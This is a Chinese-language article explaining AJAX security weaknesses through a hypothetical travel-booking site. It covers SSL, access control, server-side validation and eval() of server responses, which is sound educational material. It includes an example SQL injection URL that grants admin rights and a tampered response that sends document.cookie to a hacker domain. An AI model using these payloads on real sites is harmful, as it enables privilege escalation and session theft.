Web開發者不會注意到由 “AJax(Asynchronous Javascript And XML)”所帶來的激情。不費力氣就能創建像Google Suggest那樣的智能網站或者像Gmail那樣基於Web的應用程序,這在很大程度上要歸功於這種技術。然而,伴隨著AJAX應用程序的發展,我們發現了它的一些不足之處,我們發現它的安全漏洞也在逐漸變大,就像慢慢地把基於AJax的站點放入了一顆定時炸彈中。 web開發者不會注意到由 “AJax(Asynchronous Javascript And XML)”所帶來的激情。不費力氣就能創建像Google Suggest那樣的智能網站或者像Gmail那樣基於Web的應用程序,這在很大程度上要歸功於這種技術。然而,伴隨著AJAX應用程序的發展,我們發現了它的一些不足之處,我們發現它的安全漏洞也在逐漸變大,就像慢慢地把基於AJax的站點放入了一顆定時炸彈中。
AJax的好處
在當年“Web應用程序”的美好時代,事情非常簡單。你填寫了一個表單,點擊“提交”按鈕,然後當前屏幕就消失了,等待一小會兒後你就轉入到了下一個頁面。今天的狀況已經不是這樣的了,用戶需要的是一種就像任何桌面應用程序那樣流暢、快捷和人性化的Web體驗。
AJax經常是和DHtml(Dynamic Html)一起協作的,它的順利執行需要允許網頁中的JavaScript代碼和web服務器在後台無縫通訊。比方說,當你開始在Google Suggest的搜索框中輸入東西時,web頁面就和服務器在後台開始交換數據,然後會給出一些你可能需要的詞條等。所有的這一切都不需要頁面刷新或者按下任何按鈕。同樣這也就是像Gmail那樣的應用程序怎麼能對實時拼寫檢查做的那麼好的原因。
AJax怎樣工作
AJax復雜的原理已經超出了今天所要闡述的范圍,這裡只簡單描述一下。你的頁面上的JavaScript代碼能夠在不依賴於用戶的情況下和你的Web服務器取得聯系。這裡面起核心作用的就是Javascript的XMLhttpRequest對象,這個對象能夠被就像用戶敲擊鍵盤或者時鐘事件在後台或者異步觸發(也就是術語異步JavaScript和XML)。
如果你在Google Suggest中輸入“AJax”後,就會得到像我輸入後得到的服務器請求一樣:
1. www.google.com/complete/search?hl=en&js=true&qu=aj
2. www.google.com/complete/search?hl=en&js=true&qu=aja
3. www.google.com/complete/search?hl=en&js=true&qu=ajax
在這個術語中的XML部分有一點會引起人們的誤解,其實這一部分是沒有任何意義的。它是從Javascript對象得來的名字,同時許多AJax風格的應用程序使用了XML,這個對象能夠就任何事務向服務器發出一個請求。甚至JavaScript代碼本身也能夠被取回和評估。繼續完成我的輸入“AJax example”,將會從Google的服務器產生下面的回應:
sendRPCDone(frameElement, "ajax example", new Array("ajax example", "AJax examples"), new Array("153,000 results", "177,000 results"), new Array(""));
這將會給你一些關於強大的AJax的暗示吧,它具有在運行中(on the fly)把新的JavaScript代碼加入到浏覽器中的能力。然而,最優化的方法看起來好像束縛了XML協定。舉個例子說明一下,比如Google產生了下面的這個東西:
AJax example
153,000
AJax examples
177,000
顯然,你可以在一個合適的表單中解釋這些XML數據,但我們要感謝JavaScript,它確實能夠在一些非常典型的限制條件下和大量討厭的IE bug環境裡非常好的處理XML對象。
為了幫助你理解一些Ajax的問題,我在這裡給你介紹一個假想的旅行公司-“時代尖端旅行公司”。由於受到AJax bug的推動,他們的主要web開發者Max Uptime為了創建一個這樣的應用程序,他決定混合使用AJax,這樣,他走在時代尖端了。
AJax的問題
半數以上的AJAX安全風險來自隱含在服務器中的漏洞。顯然,使用安全編碼技術的好的設計,對於更安全的AJax大有幫助,我們需要感謝Max熟悉開放萬維網應用安全計劃(the Open Web application Security PRoject - OWASP)排名前十的最嚴重web應用程序安全漏洞列表(www.owasp.org)。不幸的是,當Max實現AJax的時候,他仍然需要面對許多額外的因素:
1.新的技術:如果Max想把他的站點連接到一個SQL數據庫,他在Google查到了數百萬的例子。AJax技術,不管這種技術有多年輕,它仍然是出現在采購循環中相對較早的,盡管它只有很少一部分好的例子出現在網絡上。為了解決一些難處理的和不必要的復雜問題,這就要求像Max那樣的開發者去自主開發。Max也就不得不編寫服務器端和客戶端的代碼,創建他自己不太確定的協議(特別是對服務器響應來講)。不管這些協議有多好,都將會及時表現在頁面上。
2.非傳統方式的設計:AJax有一點點不同於傳統設計方式,因為這樣的應用程序是半客戶端半服務端的。在Max的例子裡,他是唯一的開發者,所以他為服務端和客戶端都能夠進行編碼。在同一時間使用兩種不同的語言(特別是在早期階段)進行開發將會產生一些初級的編碼錯誤,因為他要在兩端來回跳躍,對一端來講非常好,但可能在另一端不能夠勝任。即使Max有一個大的開發團隊,安全編碼責任也可能在服務端和客戶端開發小組之間代碼移交的時候發生問題。
3.太多的腳本語言:Max憑借他自己的聰明才智決定建立世界上最優秀的旅行登記工具。你從輸入你現在的位置(通過郵政編碼、電話區號或者GPS等等)開始登記,這時候一個AJax請求就會被立即發送來確定你確切的位置。從那時候開始,屏幕上就會填入你所有可以利用的旅行方式,這一切甚至都是在你決定你想要去什麼地方、你打算什麼時候動身和你打算和誰一同去之前就完成的。
這個屏幕上的單元格和控件都充滿了AJax驅動,服務器端和客戶端的腳本可能需要超過20個不同的服務器調用。你可以想像一個很小的個體服務器程序,比如findairportsbylocation.ASPx 或者 determinemaxbaggageallowancebyairline.PHP.
顯而易見,如果沒有Max的仔細計劃(比如創建多功能的“重載”Javascript函數和服務器腳本),每一次設計他都需要創建超過40個獨立的部分。更多的編程意味著會產生更多的錯誤和bug,意味著需要更多的時間去編寫、管理、測試和更新代碼。不僅如此,因為在客戶端的JavaScript代碼中應用了大量的這種腳本,他們在正式的程序測試中也容易變得很健忘。
4.確定小部分的AJAX不會引起危害:這個站點是一個計劃出行的站點,但是Max考慮的是它將立刻為你提供一個顯示精確位置的衛星視圖,並且把你所要到達目的地的天氣情況也提供給你。AJAX最大的誘惑之一看起來好像是直到最後一刻它還在進行其它的操作,就像一個講解員在那裡解說一樣,為了AJAX使用了AJax。當Max開始嘗試他的新想法時,他會逐漸嘗試增加更多新的功能,完全忽視測試的需要。
5.不安全的通訊:每一個AJax調用可能只回傳很少數量的數據給客戶端,但那些數據是私有的、保密的。Max可以編寫一個便利的工具來對你的信用卡號碼進行數字校驗,但是如果使用純文本代替over SSL進行發送數據會怎樣呢?這是一個顯而易見的問題,但是當有許多例行程序需要考慮,特別是屏幕上其它99%的數據不是真正的機密數據時,很容易就會忽視掉SSL的。
6.服務器端訪問控制:使用JavaScript程序來觸發AJax經常會掩飾一些顯而易見的編碼錯誤,服務器端訪問控制就是一個例子。假設Max想參考你上次游覽的一個詳細目的地來為你提供你中意的旅館,他可能會是像下面這樣:
showprevioushotels.ASPx?userid=12345&destination=UK
這當然是非常好的,但是如果一個惡意用戶把URL改成了如下所示該怎麼辦呢:
showprevioushotels.ASPx?userid=12346&destination=%
他們會得到其他人最喜愛的旅館嗎?(注意:%在SQL語句中是通配符)。無疑,這是一個沒有什麼危害的例子,但是Max應該使用session、cookIE或者其它符號形式來確保數據能並且只能發送到正確的用戶那裡。它們可能僅僅是數據的一小部分,但它們可能就是最重要的一小部分。
7.服務器端驗證:實際上這裡有兩個問題。第一,AJax控制經常被用來在用戶最後提交到服務器之前的輸入驗證。這麻痺了Max,使Max有一種虛假的安全感,原因是他建立了稱作alloweddestinations.PHP的函數,根據用戶的ID來決定他們能夠到達的正確目的地。
因為這是一個服務器端的檢查,當這個頁面最後被提交的時候他不必再次為在服務器上做檢查而煩惱,這裡我們假定不會有惡意的用戶暗中破壞從alloweddestinations.PHP的響應或者破壞對服務器最後的請求。
AJax控制可以比用戶自己更仔細驗證用戶的輸入,但是他們還是經常在服務器上最後做一次驗證。
AJax驗證的第二個問題就是控制本身會受到驗證漏洞的影響。這裡再次強調一下,URL通常是隱藏著的,所以也會經常忘掉它。舉例說明一下,也許我可以使用SQL Injection來對剛才的腳本進行攻擊,如下所示:
showprevioushostels.ASPx?userid='; update users set type='admin' where userid=12345;--
就會讓我登錄後具有系統管理員的權限。當然,如何取得那些表名(table)和字段名已經超出了本文討論的范圍,但是你已經了解這種情況了,不是嗎?
8.客戶端驗證:我們已經知道在剛才的Google Suggest例子中,通過簡單評測服務端的響應後動態創建和執行JavaScript函數是可行的。如果沒有任何形式的驗證(如果這樣的話在客戶端很難保證可靠性和流暢性),客戶端將僅僅簡單執行服務器需要它完成的事情。
這樣的話,由於真正的代碼怎麼執行的對於一個普通用戶來講是永遠看不到的(也就是說你不能夠“查看源文件”),於是潛在地為惡意的黑客們打開了一個完全的攻擊導向。如果服務器的響應持續不斷地被搗亂(這種破壞行為可能是在Web服務器本身也可能是在數據傳輸過程中),這種攻擊將很難被發現。
Max使用下面的響應在目的地網頁上更新天氣圖標,他是用的函數是eval();函數:
updateWeatherIcon('cloudy.gif');
然而,惡意的cracker能夠把這個函數變成下面的形式,這樣要發現這種攻擊就更加困難了:
updateWeatherIcon('www.myhackingsite.ru/grab.ASPx?c=' + document.cookIEs); updateWeatherIcon('cloudy.gif');
我們現在能夠在我們自己的服務器上跟蹤每一個用戶的session ID/cookIE。
小結
毫無疑問,AJAX和AJAX-style技術都是通向web設計的光明大道。開發者可以在web上創造出以前從所未有的真正的“應用程序”,使用AJax必須小心謹慎,這樣才能夠保證web站點的安全。
然而,最大的威脅之一,來自日益復雜的使用AJax的客戶端腳本和服務器端腳本。這些腳本被技術手段隱藏在了視線之外,使測試很不直觀;同時,這種新技術看起來也使web開發者忘掉了基本的好的編碼方式。就像訪問控制和輸入校驗這樣的問題也不會消失,它們變得更多更復雜了。
-